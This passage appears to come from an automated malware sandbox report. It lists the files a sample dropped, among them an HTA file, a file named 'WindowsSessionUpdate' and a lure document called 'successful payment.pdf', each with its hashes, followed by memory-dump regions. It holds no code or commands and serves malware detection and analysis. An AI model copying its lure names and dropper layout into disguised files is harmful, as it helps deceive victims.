b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
efa4168b73a5e8ae56d49bcac4d67861

SHA1
b3fe6b2d9fc05ad7892a2c8b96914764336b3067

SHA256
7aab157fba3a543647a38cc8729ffb962a58cc2093d94566c9e68ff73d134dca

SHA512
a1f305eac9c73c951f22e76f3904c1c6bb518b12d8a74bbea544c845f3d592e7915ec47d6531a3a4e669f6ab12311f3a632ff47a68f36370111d1c82cf8b6e99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
83685d101174171875b4a603a6c2a35c

SHA1
37be24f7c4525e17fa18dbd004186be3a9209017

SHA256
0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

SHA512
005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mw5cm0ub.reh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\1.hta

Filesize
954B

MD5
6b2bf08de9b0ce2b2e036e69d4641bd6

SHA1
4387ae0f72653905093cb868590d4cf2c9591c20

SHA256
ac1a237a5a1002cf5103e24b558b2719bc343e3df114e791e914439f08d3b46e

SHA512
292990b477aaa7b983bd08ee988e9f8dcd1761737f674b3e858373fc5e9d785b646f237e588c072b5984756a557226b143d2356b3ce17fc8efe682a0be3414f2

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate

Filesize
40KB

MD5
ba061861481a48da1ae6efb1c678f26c

SHA1
16089c304dc7b702e250ac9c8b8cfc61812c7a21

SHA256
90bfa328b18828073b2ea5d1c3151a5606cb55b26c7660e5ce53a0b9dfc7c0b6

SHA512
67f45fd0897bc591177acedb95fb250c093163a6ef5bba8430c105ce10d48340f33c3fd7d190d468aab6fca2f5d1d155e9f375e4f0552865ebe7677ac8aeb428

Download Submit
C:\Users\Admin\AppData\Roaming\successful payment.pdf

Filesize
89KB

MD5
609c3fe620acd93745b01a2115dfb2ea

SHA1
8552ce163f5bdd8e729091416f961d2e3cff53d1

SHA256
be1c0ba85aa8a85432f3e8764517a8aec6e34dcbc807f6f122b9f2895ba2b850

SHA512
96b9ab8f4fd84980b75760279273d815b7ec16b9ef6a0582c5bb539f3a58a6430f5208089203f341755b0821f3c29144f509b5f285e97bd1af4d9dc9361de344

Download Submit
memory/376-185-0x000000000B020000-0x000000000B2CB000-memory.dmp

Filesize
2.7MB

Download
memory/376-187-0x000000000B020000-0x000000000B16D000-memory.dmp

Filesize
1.3MB

Download
memory/4848-188-0x000000001DF90000-0x000000001E2E0000-memory.dmp

Filesize
3.3MB

Download
memory/4848-134-0x0000000000D80000-0x0000000000D90000-memory.dmp

Filesize
64KB

Download
memory/4848-189-0x0000000002F40000-0x0000000002F4E000-memory.dmp

Filesize
56KB

Download
memory/4848-190-0x000000001E930000-0x000000001EA50000-memory.dmp

Filesize
1.1MB

Download
memory/5520-0-0x00007FFBC4553000-0x00007FFBC4555000-memory.dmp

Filesize
8KB

Download
memory/5520-1-0x00000000000D0000-0x00000000000F0000-memory.dmp

Filesize
128KB

Download
memory/5792-144-0x00000174B0F00000-0x00000174B0F22000-memory.dmp

Filesize
136KB

Download